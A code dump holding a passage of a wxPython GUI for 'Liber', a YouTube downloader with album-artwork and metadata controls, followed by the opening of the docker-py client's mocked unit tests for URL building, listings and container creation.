self.radioDownloadPath.Bind(wx.EVT_RADIOBUTTON, self.onChooseDownloadPath, self.radioDownloadPath)
stDownloadLoc = wx.StaticText(self, wx.ID_ANY, label="Download to:")
objects = [stDownloadLoc, self.radioIT, self.radioDownload, self.radioDownloadPath]
object_sizes = [self.GetTextExtent(stDownloadLoc.Label)[0], self.radioIT.GetSize()[0],
self.radioDownload.GetSize()[0], self.radioDownloadPath.GetSize()[0], ]
vSizer = self.sizeElementsInAColumn(objects, object_sizes, LINE_SIZE, vSizer, padding=(0, 0))
if Liber.ITUNES is None:
self.radioIT.Disable()
self.radioDownload.SetValue(True)
if Liber.DOWNLOADS is None:
self.radioDownload.Disable()
self.radioDownloadPath.SetValue(True)
stChangeAA = wx.StaticText(self, label="Change Album Artwork: ")
self.btAAPath = wx.Button(self, wx.ID_ANY, label="From File", size=(wx.Button.GetDefaultSize()[0],
self.GetTextExtent("Fl")[1]))
self.btAAPath.Bind(wx.EVT_BUTTON, self.onChooseAAPath, self.btAAPath)
self.btAAURL = wx.Button(self, wx.ID_ANY, label="From URL", size=(wx.Button.GetDefaultSize()[0],
self.GetTextExtent("FURL")[1]))
self.btAAURL.Bind(wx.EVT_BUTTON, self.onChooseAAURL, self.btAAURL)
self.btAAThumb = wx.Button(self, wx.ID_ANY, label="Thumbnail", size=(wx.Button.GetDefaultSize()[0],
self.GetTextExtent("Tlb")[1]))
self.btAAThumb.Bind(wx.EVT_BUTTON, self.onChooseAAThumb, self.btAAThumb)
objects = [stChangeAA, self.btAAPath, self.btAAURL, self.btAAThumb]
object_sizes = [self.GetTextExtent(stChangeAA.Label)[0], self.btAAPath.GetSize()[0],
self.btAAURL.GetSize()[0], self.btAAThumb.GetSize()[0]]
column_items += 1
if column_items == max_column_items or len(vSizer.GetChildren()) > 1:
self.metadataSizer.Add(vSizer)
self.metadataSizer.Add((10, -1))
vSizer = wx.BoxSizer(wx.VERTICAL)
else:
vSizer.Add((-1, 5))
# this bit of code will go through the object_sizes and determine how many of the objects it can fit
# in the space of LINE_SIZE.
vSizer = self.sizeElementsInAColumn(objects, object_sizes, LINE_SIZE, vSizer)
self.metadataSizer.Add(vSizer, proportion=0)
self.mainSizer.Add(self.metadataSizer)
self.mainSizer.Add((-1, 5))
stDownloadAs = wx.StaticText(self, wx.ID_ANY, label="as")
# adding the wx.RB_GROUP allows for a these radio buttons to be pressed along with the previous radio
# buttons. this way pressing on one of the previous radio buttons does not 'de-press' any of these radio
# buttons
self.radioAudio = wx.RadioButton(self, wx.ID_ANY, label="music", style=wx.RB_GROUP)
self.radioAudio.SetValue(True)
self.Bind(wx.EVT_RADIOBUTTON, self.onChangeDownloadType, self.radioAudio)
self.radioVideo = wx.RadioButton(self, wx.ID_ANY, label="video.")
self.Bind(wx.EVT_RADIOBUTTON, self.onChangeDownloadType, self.radioVideo)
self.progressBar = wx.Gauge(self, id=wx.ID_ANY, range=100, size=(TILE_SIZE[0], -1), style=wx.GA_HORIZONTAL)
self.btDownload = wx.Button(self, id=wx.ID_ANY, label="")
self.updateDownloadLabel()
self.btDownload.Bind(wx.EVT_BUTTON, self.download, self.btDownload)
hSizer = wx.BoxSizer(wx.HORIZONTAL)
hSizer.Add(self.btDownload, flag=wx.ALIGN_LEFT)
hSizer.Add((5, -1))
hSizer2 = wx.BoxSizer(wx.HORIZONTAL)
hSizer2.Add(stDownloadAs)
hSizer2.Add(self.radioAudio)
hSizer2.Add(self.radioVideo)
vWrapper = wx.BoxSizer(wx.VERTICAL)
vWrapper.Add((-1, 5))
vWrapper.Add(hSizer2)
hSizer.Add(vWrapper)
self.mainSizer.Add(hSizer)
self.mainSizer.Add(self.progressBar)
self.mainSizervWrapper = wx.BoxSizer(wx.HORIZONTAL)
self.mainSizervWrapper.Add(self.mainSizer)
self.mainSizervWrapper.Add((20, -1))
self.SetSizer(self.mainSizervWrapper)
self.SetSize(TILE_SIZE)
self.logger.info("Construction finished.")
def sizeElementsInAColumn(self, objects, object_sizes, line_size, vSizer, padding=(-1, 7)):
"""
This is a recursive function that will take in the object_sizes and determine based on that how many
objects it can fit in the space of line_size. These objects are added to a horizontal box sizer and that box
sizer is then added to vSizer. Then, this function will call itself once again, so that it will be able to
add multiple rows of items with different amounts of objects to vSizer. vSizer is then returned when the
recursion has finished.
:param objects: Objects to add to vSizer
:param object_sizes: The sizes of the objects (width)
:param line_size: The amount of space the objects have to fit in/ their constraint (width)
:param vSizer: The vertical sizer that the objects and horizontal sizers are added to.
:param padding: Extra padding to add between each element in the vSizer (vertical padding)
:return: the finished vSizer with all the objects in it.
"""
if len(objects) == 0: # terminating parameter
return vSizer
else:
# starts by trying to add as many objects as it can to the horizontal sizer, then works its way back,
# removing one object at a time
for x in range(len(objects) + 1)[::-1]:
if sum(object_sizes[:x]) + 10 < line_size:
hSizer = wx.BoxSizer(wx.HORIZONTAL)
for y in objects[:x]:
hSizer.Add(y)
hSizer.Add((5, -1))
vSizer.Add(hSizer)
vSizer.Add(padding)
vSizer.Layout()
# start recursion
vSizer = self.sizeElementsInAColumn(objects[x:], object_sizes[x:], line_size, vSizer)
return vSizer
def updateDownloadLabel(self, label=None):
"""
Changes self.btDownload's label either the given string or to the current download path
:param label: String to write to btDownload's label
"""
if label is None:
label = "Download to {}".format(self.downloadPath if self.downloadPath != Liber.ITUNES else "iTunes")
self.logger.debug("Updating the download button's label to: {}".format(label))
self.btDownload.SetLabel(label)
self.btDownload.SetSize(self.btDownload.GetEffectiveMinSize())
self.mainSizer.Layout()
def worker(self, function, args, kwargs):
"""
Opens up a new thread, which opens up another process to perform a certain task
:param function: function to run
:param args: args to be passed to function
:param kwargs: kwargs to be passed to function
"""
self.logger.info("Worker process started. Function: %s" % function)
thread = threading.Thread(target=function, args=args, kwargs=kwargs)
thread.start()
def onReset(self, event):
"""
Resets the progress bar and download button to their default values.
"""
self.logger.info("EVT_RESET_PROGRESSBAR_AND_DOWNLOADBUTTON detected. Resetting values.")
self.updateDownloadLabel()
self.btDownload.Enable()
self.progressBar.SetValue(0)
def resetPBandDBThread(self):
"""
Thread that waits a certain amount of seconds and then posts a EVT_RESET_PROGRESSBAR_AND_DOWNLOADBUTTON event
"""
sleep_time = 6
self.logger.info("Reset progressbar and download button thread started. Sleeping {} seconds".format(sleep_time))
wx.Sleep(sleep_time)
self.logger.info("{} seconds up. Posting EVT_RESET_PROGRESSBAR_AND_DOWNLOADBUTTON".format(sleep_time))
evt = ChangeAAEvent(myEVT_RESET_PROGRESSBAR_AND_DOWLOADBUTTON, -1)
wx.PostEvent(self, evt)
def onChangeAA(self, event):
"""
Called when a change aa event is called. Gets the value from the event and changes the album artwork data
to that value
"""
self.logger.info("EVT_CHANGE_AA event detected. Changing album artwork.")
self.artworkImage.LoadStream(StringIO.StringIO(event.GetValue()))
self.artworkImage.Rescale(*ALBUM_ART_SIZE)
self.artwork.SetBitmap(wx.BitmapFromImage(self.artworkImage))
self.Refresh()
def changeAAThread(self, image):
"""
Pulls album art image. Change aa event is posted to tell the parent to take the given data and apply it to
the album artwork image. The source of the image (url/file path) is stored.
:param image: can either be a url or a file path to a jpg/png.
"""
self.logger.info("Changing album art image to: '%s'" % image)
try:
self.artworkSource = image
artworkData = self.YTSong.get_artwork(image)
self.logger.info("Obtaining album art was a success. Positing event")
evt = ChangeAAEvent(myEVT_CHANGE_AA, -1, artworkData)
wx.PostEvent(self, evt)
except:
self.logger.warning("Failure to obtain image")
self.artworkSource = None
bitmap = wx.EmptyBitmap(ALBUM_ART_SIZE)
memDC = wx.MemoryDC()
memDC.SelectObject(bitmap)
memDC.DrawText("F", (ALBUM_ART_SIZE[0] - memDC.GetTextExtent("F")[0]) / 2,
(ALBUM_ART_SIZE[1] - memDC.GetTextExtent("F")[1] / 2))
# take the selected bitmap out of memory
memDC.SelectObject(wx.NullBitmap)
image = wx.ImageFromBitmap(bitmap)
data = image.GetAlphaData()
evt = ChangeAAEvent(myEVT_CHANGE_AA, -1, data)
wx.PostEvent(self, evt)
def onChooseAAPath(self, event):
"""
Opens up a dialog that asks a user for a path to a jpg or png image, then tells a worker thread to change
the album artwork to the user's input
"""
self.logger.info("Choose album artwork (path) event triggered. Opening a dialog to get user input")
openFileDialog = wx.FileDialog(self, "Open a jpg/png image for the album artwork.", "", "",
"JPG files (*.jpg)|*.jpg|PNG files (*.png)|*.png",
wx.FD_OPEN | wx.FD_FILE_MUST_EXIST)
if openFileDialog.ShowModal() != wx.ID_CANCEL:
self.worker(self.changeAAThread, (openFileDialog.GetPath(),), {})
self.logger.info("Album artwork location changed. New album artwork path is: {}".format(
openFileDialog.GetPath()))
else:
self.logger.info("Choose album artwork (path) event canceled. ")
def onChooseAAURL(self, event):
"""
Opens up a dialog that asks a user for a url to a jpg or png image, then tells a worker thread to change
the album artwork to the user's input
"""
self.logger.info("Choose album artwork (URL) event triggered. Opening a dialog to get user input")
textEntryDialog = wx.TextEntryDialog(self, "Please enter a URL to a jpg or png image for the album artwork.",
caption="Enter URL")
if textEntryDialog.ShowModal() != wx.ID_CANCEL:
self.worker(self.changeAAThread, (textEntryDialog.GetValue(),), {})
self.logger.info("Album artwork location changed. New album artwork location is: {}".format(
textEntryDialog.GetValue()))
else:
self.logger.info("Choose album artwork (URL) event canceled.")
def onChooseAAThumb(self, event):
"""
Changes the album artwork to that of the video's thumbnail.
"""
self.logger.info("Choose album artwork (thumb) event triggered. Changing album artwork to the thumbnail")
self.worker(self.changeAAThread, (self.YTSong.thumb, ), {})
def onChooseDownloadPath(self, event):
"""
Opens up a dialog allowing the user to choose their own download path.
"""
self.logger.info("Choose download path event triggered. Opening a dialog for user input now.")
dirDialog = wx.DirDialog(self, "Please choose a folder in which to download the file into.")
if dirDialog.ShowModal() != wx.ID_CANCEL:
self.downloadPath = dirDialog.GetPath()
self.tempDownloadPath = self.downloadPath
self.radioDownload.SetValue(False)
self.radioIT.SetValue(False)
self.logger.info("Download path changed. New download path is: {} and new temp download path is: {}".format(
self.downloadPath, self.tempDownloadPath))
self.updateDownloadLabel()
else:
self.logger.info("Choose download path event canceled.")
def onChangeDownLociTunes(self, event):
"""
Changes self.downloadPath to Liber.ITUNES and changes self.tempDownloadPath to Liber.ITUNES_TEMP
"""
self.logger.info("Download to iTunes radio button triggered. Changing download path to Liber.ITUNES and "
"changing temp download path to Liber.ITUNES_TEMP")
self.downloadPath = Liber.ITUNES
self.tempDownloadPath = Liber.ITUNES_TEMP
self.updateDownloadLabel()
def onChangeDownLocDownloads(self, event):
"""
Changes self.downloadPath and self.tempDownloadPath to Liber.DOWNLOADS
"""
self.logger.info("Download to downloads radio button triggered. Changing download path to Liber.DOWNLOADS "
"and changing temp download path to Liber.DOWNLOADS")
self.downloadPath = Liber.DOWNLOADS
self.tempDownloadPath = self.downloadPath
self.updateDownloadLabel()
def onChangeDownloadType(self, event):
"""
Logs the event of the user changing the download type and updates self.downloadType based on the values of
self.radioAudio and self.radioVideo. Also disable all elements of the GUI that cannot be used with the
associated download type.
:return: None
"""
if self.radioAudio.GetValue() is True:
self.downloadType = Liber.ID_AUDIO
for x, y in self.metadata.items():
y[1].Enable()
self.btAAPath.Enable()
self.btAAThumb.Enable()
self.btAAURL.Enable()
elif self.radioVideo.GetValue() is True:
self.downloadType = Liber.ID_VIDEO
for x, y in self.metadata.items():
if x != 'title':
y[1].Disable()
self.btAAPath.Disable()
self.btAAThumb.Disable()
self.btAAURL.Disable()
self.logger.info("Download type has been changed to {} (Liber.ID_AUDIO: {}, Liber.ID_VIDEO: {})".format(
self.downloadType, self.downloadType == Liber.ID_AUDIO, self.downloadType == Liber.ID_VIDEO))
def onUpdatePB(self, event):
"""
Updates the progress bar using the given ratio found in event.GetValue(). Since we are tracking two ratios
that return how much they are complete out of 100, we have to split the progress bar into two.
"""
if self.downloadType == Liber.ID_AUDIO:
if self.progressBar.GetValue() >= 50:
value = 50 + event.GetValue() * 50
else:
value = event.GetValue() * 50
elif self.downloadType == Liber.ID_VIDEO:
value = event.GetValue() * 100
else:
value = 100
self.logger.warning("Invalid download type. Cannot update progress bar! Setting value to 100.")
self.progressBar.SetValue(value)
if self.progressBar.GetValue() >= 100:
self.updateDownloadLabel("Finished")
self.enableDownloads = True
self.worker(self.resetPBandDBThread, (), {})
def callbackDownload(self, total, recvd, ratio, rate, eta):
"""
Changes the progress bar based on download ratio. In order to do this the EVT_CHANGE_SB is raised
:param total: Total download size (bytes)
:param recvd: Total amount downloaded (bytes)
:param ratio: Percentage downloaded
:param rate: Rate of download
:param eta: Estimated Time until Arrival of song
"""
evt = UpdateProgressBarEvent(myEVT_UPDATE_PROGRESSBAR, -1, ratio)
wx.PostEvent(self, evt)
def callbackMetadata(self, ratio):
"""
While metadata is being added in the Liber module, this funciton is called to show progress.
:param ratio: 0<x<1, percentage of completion for adding the metadata
"""
evt = UpdateProgressBarEvent(myEVT_UPDATE_PROGRESSBAR, -1, ratio)
wx.PostEvent(self, evt)
def download(self, evt):
"""
Calls the paired YTSong method download, using self.callback to change the progress bar and threading.
"""
self.logger.info("Download method invoked. Downloading now.")
if self.downloadPath is not None and self.tempDownloadPath is not None and self.enableDownloads is True:
self.btDownload.Disable()
self.updateDownloadLabel("Downloading...")
self.btDownload.Fit()
self.enableDownloads = False
self.progressBar.SetValue(0)
metadata = {}
for x, y in Liber.METADATA.items():
metadata[x] = self.metadata[x][1].GetValue()
self.worker(self.YTSong.download, (self.downloadPath, self.tempDownloadPath),
{"downloadType": self.downloadType, "metadata": metadata, "album_artwork": self.artworkSource,
"callbackDown": self.callbackDownload, "callbackMetadata": self.callbackMetadata})
elif self.enableDownloads is False:
self.logger.info("Unable to download: it has been disabled.")
else:
self.logger.error("Unable to download: None of the radio buttons have been pressed- no "
"download location set!")
class MainFrame(wx.Frame):
"""
This is the GUI structure that holds all the tiles in a scrollable window. Contains a download-all button, an
add new tile button, and the about and help menus.
"""
def __init__(self, parent, *args, **kwargs):
"""
Create the frame and ask for the first URL.
"""
self.logger = logger.getChild("MainFrame")
self.logger.info("Constructing")
super(MainFrame, self).__init__(parent, *args, **kwargs)
self.SetSize(TILE_SIZE)
self.tiles = []
# add an icon and a title
if platform.system() == 'Windows':
self.SetIcon(wx.Icon(os.getcwd()+'\docs\\256x256.png',
wx.BITMAP_TYPE_ANY))
else:
self.SetIcon(wx.Icon(os.getcwd()+'/docs/256x256.png',
wx.BITMAP_TYPE_ANY))
self.SetTitle("Liber")
menuBar = wx.MenuBar()
fileMenu = wx.Menu()
fileAbout = fileMenu.Append(wx.ID_ABOUT, 'About', 'Show information about this application')
self.Bind(wx.EVT_MENU, self.onAbout, fileAbout)
fileExit = fileMenu.Append(wx.ID_EXIT, 'Exit', 'Exit application')
self.Bind(wx.EVT_MENU, self.onClose, fileExit)
menuBar.Append(fileMenu, '&File')
self.SetMenuBar(menuBar)
self.scrollPanel = scrolled.ScrolledPanel(self, size=(TILE_SIZE[0] + 50, TILE_SIZE[1]))
self.scrollPanelvSizer = wx.BoxSizer(wx.VERTICAL)
self.scrollPanel.SetSizer(self.scrollPanelvSizer)
self.scrollPanel.SetAutoLayout(1)
self.scrollPanel.SetupScrolling(50, 50, 0)
self.controlPanel = wx.Panel(self, size=(TILE_SIZE[0], -1))
self.controlPanel.SetBackgroundColour("#ff3333")
self.btDownloadAll = wx.Button(self.controlPanel, wx.ID_ANY, "Download all")
self.Bind(wx.EVT_BUTTON, self.onDownloadAll, self.btDownloadAll)
self.btAddTile = wx.Button(self.controlPanel, wx.ID_ANY, "Add video")
self.Bind(wx.EVT_BUTTON, self.onAddTile, self.btAddTile)
self.btExit = wx.Button(self.controlPanel, wx.ID_ANY, "Exit")
self.Bind(wx.EVT_BUTTON, self.onClose, self.btExit)
self.Bind(wx.EVT_CLOSE, self.onClose)
vSizer = self.getControlPanelSizer()
self.controlPanel.SetSizerAndFit(vSizer)
self.mainSizer = wx.BoxSizer(wx.HORIZONTAL)
self.mainSizer.Add(self.controlPanel, flag=wx.EXPAND | wx.ALIGN_LEFT)
self.mainSizer.Add(self.scrollPanel, flag=wx.EXPAND)
self.SetSizer(self.mainSizer)
self.onAddTile(None)
self.Fit()
self.Show()
def onAbout(self, event):
"""
Displays an about dialog
"""
description = """Liber is an application that is meant to help others download YouTube videos
with ease of use, for it puts all the steps into one location (such as: adding information to the audio,
adding album artwork to the audio, adding the audio/video into iTunes, etc.). That being said, Liber's intent is
for downloading NON-COPYRIGHTED music/content, for doing so is illegal. Also, watching YouTube videos without
streaming them is a violation of YouTube's end user agreement, so use at your own risk
(see http://www.pcadvisor.co.uk/how-to/internet/is-it-legal-download-youtube-videos-3420353/ for more
info). If you would like to report a bug or contribute to this open-source project, see:
https://github.com/DevelopForLizardz/Liber"""
licence = """Liber is free software and can be used, modified and distributed, however only done so under the
terms and conditions of the MIT License (which can be found here: https://opensource.org/licenses/MIT). Liber
is also distributed without any warranty."""
info = wx.AboutDialogInfo()
info.SetIcon(wx.Icon(os.path.dirname(__file__)+'/docs/512x512.png', wx.BITMAP_TYPE_ANY))
info.SetName("Liber")
info.SetVersion(str(__version__))
info.SetDescription(description)
info.SetCopyright('(C) 2015 Ryan Drew')
info.SetLicense(licence)
info.AddDeveloper("Ryan Drew")
info.AddArtist("Grace Drew")
wx.AboutBox(info)
def getControlPanelSizer(self):
"""
Returns a horizontal box sizer that contains the elements for the control panel area on the left side.
This allows for that area to be resized easily when the size of the window changes
"""
controlEndPadding = (-1, (self.GetSize()[1] - (10 + self.btDownloadAll.GetSize()[1] +
self.btAddTile.GetSize()[1] + self.btExit.GetSize()[1])) / 4.0)
hSizer = wx.BoxSizer(wx.VERTICAL)
hSizer.Add(controlEndPadding)
hSizer.Add(self.btDownloadAll, flag=wx.CENTER)
hSizer.Add(controlEndPadding)
hSizer.Add(self.btAddTile, flag=wx.CENTER)
hSizer.Add(controlEndPadding)
hSizer.Add(self.btExit, flag=wx.CENTER)
hSizer.Add(controlEndPadding)
return hSizer
def onDownloadAll(self, event):
"""
Sends a message to each tile telling them to start downloading.
"""
for x in self.tiles:
x.download(None)
def onAddTile(self, event):
"""
Obtains a YouTube URL from the user and creates a tile for it, adding the tile into self.tiles. If obtaining
the video fails, an error message dialog pops up, telling the user of the error, where they can report the
error, and whether they want to continue using the program or quit.
"""
textEntryDialog = wx.TextEntryDialog(self, "Please enter the URL for a YouTube video you wish to download",
"Enter a YouTube URL",
defaultValue="https://www.youtube.com/watch?v=dQw4w9WgXcQ")
if textEntryDialog.ShowModal() != wx.ID_CANCEL:
try:
self.tiles.append(Tile(textEntryDialog.GetValue(), self.scrollPanel, parentLogger=self.logger))
self.SetMaxSize((-1, -1))
if len(self.tiles) > 1:
self.scrollPanelvSizer.Add((-1, 10))
self.scrollPanelvSizer.Add((wx.StaticLine(self.scrollPanel, size=(TILE_SIZE[0], -1))))
self.scrollPanelvSizer.Add((-1, 10))
self.scrollPanelvSizer.Add(self.tiles[len(self.tiles) - 1])
self.scrollPanel.SetSizer(self.scrollPanelvSizer)
w, h = self.scrollPanelvSizer.GetMinSize()
self.scrollPanel.SetVirtualSize((w, h))
self.scrollPanel.AdjustScrollbars()
if self.GetSize()[1] < wx.DisplaySize()[1] / 2.0:
self.SetSize((TILE_SIZE[0]+self.controlPanel.GetSize()[0]+10, len(self.tiles) * (TILE_SIZE[1]+20)))
self.controlPanel.SetSizerAndFit(self.getControlPanelSizer())
self.SetMinSize(self.GetSize())
self.SetMaxSize(self.GetSize())
else:
self.SetMaxSize(self.GetSize())
self.scrollPanel.Scroll(0, self.GetSize()[1])
self.Refresh()
except Exception, e:
self.logger.error("An error occured while trying to create a tile", exc_info=True)
messageDialog = wx.MessageDialog(self,
"An error occured while trying to fetch your video: {}. Sorry "
"about that. To report this issue, visit: {}".format(
e, "https://github.com/DevelopForLizardz/Liber"),
style=wx.CANCEL | wx.ICON_ERROR)
messageDialog.ShowModal()
elif len(self.tiles) == 0:
self.logger.info("User pressed cancel to first 'add video' prompt. Destroying.")
self.Destroy()
self.DestroyChildren()
sys.exit(0)
def onClose(self, event):
"""
Pops up a dialog asking the user if they are sure that they want to quit. Then quits the program based
on user input
"""
self.logger.info("Close event triggered. Asking for confirmation from user.")
quitDialog = wx.MessageDialog(self, "Are you sure you want to quit?", "Exit",
style=wx.OK | wx.CANCEL | wx.ICON_HAND)
if quitDialog.ShowModal() == wx.ID_OK:
self.logger.info("Destroying")
self.Destroy()
self.DestroyChildren()
sys.exit(0)
else:
self.logger.info("Close event canceled")
if __name__ == '__main__':
app = wx.App()
frame = MainFrame(None)
frame.Show()
frame.Center()
app.MainLoop()
|
test.py
|
# Copyright 2013 dotCloud inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import datetime
import gzip
import io
import json
import os
import re
import shutil
import signal
import socket
import sys
import tarfile
import tempfile
import threading
import time
import random
import docker
import requests
import six
from . import base
from . import fake_api
from .helpers import make_tree
import pytest
try:
from unittest import mock
except ImportError:
import mock
DEFAULT_TIMEOUT_SECONDS = docker.constants.DEFAULT_TIMEOUT_SECONDS
def response(status_code=200, content='', headers=None, reason=None, elapsed=0,
request=None):
res = requests.Response()
res.status_code = status_code
if not isinstance(content, six.binary_type):
content = json.dumps(content).encode('ascii')
res._content = content
res.headers = requests.structures.CaseInsensitiveDict(headers or {})
res.reason = reason
res.elapsed = datetime.timedelta(elapsed)
res.request = request
return res
def fake_resolve_authconfig(authconfig, registry=None):
return None
def fake_inspect_container(self, container, tty=False):
return fake_api.get_fake_inspect_container(tty=tty)[1]
def fake_inspect_container_tty(self, container):
return fake_inspect_container(self, container, tty=True)
def fake_resp(method, url, *args, **kwargs):
key = None
if url in fake_api.fake_responses:
key = url
elif (url, method) in fake_api.fake_responses:
key = (url, method)
if not key:
raise Exception('{0} {1}'.format(method, url))
status_code, content = fake_api.fake_responses[key]()
return response(status_code=status_code, content=content)
fake_request = mock.Mock(side_effect=fake_resp)
def fake_get(self, url, *args, **kwargs):
return fake_request('GET', url, *args, **kwargs)
def fake_post(self, url, *args, **kwargs):
return fake_request('POST', url, *args, **kwargs)
def fake_put(self, url, *args, **kwargs):
return fake_request('PUT', url, *args, **kwargs)
def fake_delete(self, url, *args, **kwargs):
return fake_request('DELETE', url, *args, **kwargs)
url_base = 'http+docker://localunixsocket/'
url_prefix = '{0}v{1}/'.format(
url_base,
docker.constants.DEFAULT_DOCKER_API_VERSION)
class Cleanup(object):
if sys.version_info < (2, 7):
# Provide a basic implementation of addCleanup for Python < 2.7
def __init__(self, *args, **kwargs):
super(Cleanup, self).__init__(*args, **kwargs)
self._cleanups = []
def tearDown(self):
super(Cleanup, self).tearDown()
ok = True
while self._cleanups:
fn, args, kwargs = self._cleanups.pop(-1)
try:
fn(*args, **kwargs)
except KeyboardInterrupt:
raise
except:
ok = False
if not ok:
raise
def addCleanup(self, function, *args, **kwargs):
self._cleanups.append((function, args, kwargs))
@mock.patch.multiple('docker.Client', get=fake_get, post=fake_post,
put=fake_put, delete=fake_delete)
class DockerClientTest(Cleanup, base.BaseTestCase):
def setUp(self):
self.client = docker.Client()
# Force-clear authconfig to avoid tampering with the tests
self.client._cfg = {'Configs': {}}
def tearDown(self):
self.client.close()
def assertIn(self, object, collection):
if six.PY2 and sys.version_info[1] <= 6:
return self.assertTrue(object in collection)
return super(DockerClientTest, self).assertIn(object, collection)
def base_create_payload(self, img='busybox', cmd=None):
if not cmd:
cmd = ['true']
return {"Tty": False, "Image": img, "Cmd": cmd,
"AttachStdin": False,
"AttachStderr": True, "AttachStdout": True,
"StdinOnce": False,
"OpenStdin": False, "NetworkDisabled": False,
}
def test_ctor(self):
with pytest.raises(docker.errors.DockerException) as excinfo:
docker.Client(version=1.12)
self.assertEqual(
str(excinfo.value),
'Version parameter must be a string or None. Found float'
)
def test_url_valid_resource(self):
url = self.client._url('/hello/{0}/world', 'somename')
self.assertEqual(
url, '{0}{1}'.format(url_prefix, 'hello/somename/world')
)
url = self.client._url(
'/hello/{0}/world/{1}', 'somename', 'someothername'
)
self.assertEqual(
url,
'{0}{1}'.format(url_prefix, 'hello/somename/world/someothername')
)
url = self.client._url('/hello/{0}/world', '/some?name')
self.assertEqual(
url, '{0}{1}'.format(url_prefix, 'hello/%2Fsome%3Fname/world')
)
def test_url_invalid_resource(self):
with pytest.raises(ValueError):
self.client._url('/hello/{0}/world', ['sakuya', 'izayoi'])
def test_url_no_resource(self):
url = self.client._url('/simple')
self.assertEqual(url, '{0}{1}'.format(url_prefix, 'simple'))
def test_url_unversioned_api(self):
url = self.client._url(
'/hello/{0}/world', 'somename', versioned_api=False
)
self.assertEqual(
url, '{0}{1}'.format(url_base, 'hello/somename/world')
)
#########################
# INFORMATION TESTS #
#########################
def test_version(self):
self.client.version()
fake_request.assert_called_with(
'GET',
url_prefix + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_version_no_api_version(self):
self.client.version(False)
fake_request.assert_called_with(
'GET',
url_base + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_retrieve_server_version(self):
client = docker.Client(version="auto")
self.assertTrue(isinstance(client._version, six.string_types))
self.assertFalse(client._version == "auto")
client.close()
def test_auto_retrieve_server_version(self):
version = self.client._retrieve_server_version()
self.assertTrue(isinstance(version, six.string_types))
def test_info(self):
self.client.info()
fake_request.assert_called_with(
'GET',
url_prefix + 'info',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_search(self):
self.client.search('busybox')
fake_request.assert_called_with(
'GET',
url_prefix + 'images/search',
params={'term': 'busybox'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_image_viz(self):
with pytest.raises(Exception):
self.client.images('busybox', viz=True)
self.fail('Viz output should not be supported!')
def test_events(self):
self.client.events()
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={'since': None, 'until': None, 'filters': None},
stream=True
)
def test_events_with_since_until(self):
ts = 1356048000
now = datetime.datetime.utcfromtimestamp(ts)
since = now - datetime.timedelta(seconds=10)
until = now + datetime.timedelta(seconds=10)
self.client.events(since=since, until=until)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': ts - 10,
'until': ts + 10,
'filters': None
},
stream=True
)
def test_events_with_filters(self):
filters = {'event': ['die', 'stop'],
'container': fake_api.FAKE_CONTAINER_ID}
self.client.events(filters=filters)
expected_filters = docker.utils.convert_filters(filters)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': None,
'until': None,
'filters': expected_filters
},
stream=True
)
###################
# LISTING TESTS #
###################
def test_images(self):
self.client.images(all=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 0, 'all': 1},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_images_quiet(self):
self.client.images(all=True, quiet=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 1, 'all': 1},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_image_ids(self):
self.client.images(quiet=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 1, 'all': 0},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_images_filters(self):
self.client.images(filters={'dangling': True})
fake_request.assert_called_with(
'GET',
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 0, 'all': 0,
'filters': '{"dangling": ["true"]}'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_list_containers(self):
self.client.containers(all=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/json',
params={
'all': 1,
'since': None,
'size': 0,
'limit': -1,
'trunc_cmd': 0,
'before': None
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
@base.requires_api_version('1.21')
def test_list_networks(self):
networks = [
{
"name": "none",
"id": "8e4e55c6863ef424",
"type": "null",
"endpoints": []
},
{
"name": "host",
"id": "062b6d9ea7913fde",
"type": "host",
"endpoints": []
},
]
get = mock.Mock(return_value=response(
status_code=200, content=json.dumps(networks).encode('utf-8')))
with mock.patch('docker.Client.get', get):
self.assertEqual(self.client.networks(), networks)
self.assertEqual(get.call_args[0][0], url_prefix + 'networks')
filters = json.loads(get.call_args[1]['params']['filters'])
self.assertFalse(filters)
self.client.networks(names=['foo'])
filters = json.loads(get.call_args[1]['params']['filters'])
self.assertEqual(filters, {'name': ['foo']})
self.client.networks(ids=['123'])
filters = json.loads(get.call_args[1]['params']['filters'])
self.assertEqual(filters, {'id': ['123']})
#####################
# CONTAINER TESTS #
#####################
def test_create_container(self):
self.client.create_container('busybox', 'true')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox", "Cmd": ["true"],
"AttachStdin": false,
"AttachStderr": true, "AttachStdout": true,
"StdinOnce": false,
"OpenStdin": false, "NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_binds(self):
mount_dest = '/mnt'
self.client.create_container('busybox', ['ls', mount_dest],
volumes=[mount_dest])
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls", "/mnt"], "AttachStdin": false,
"Volumes": {"/mnt": {}},
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
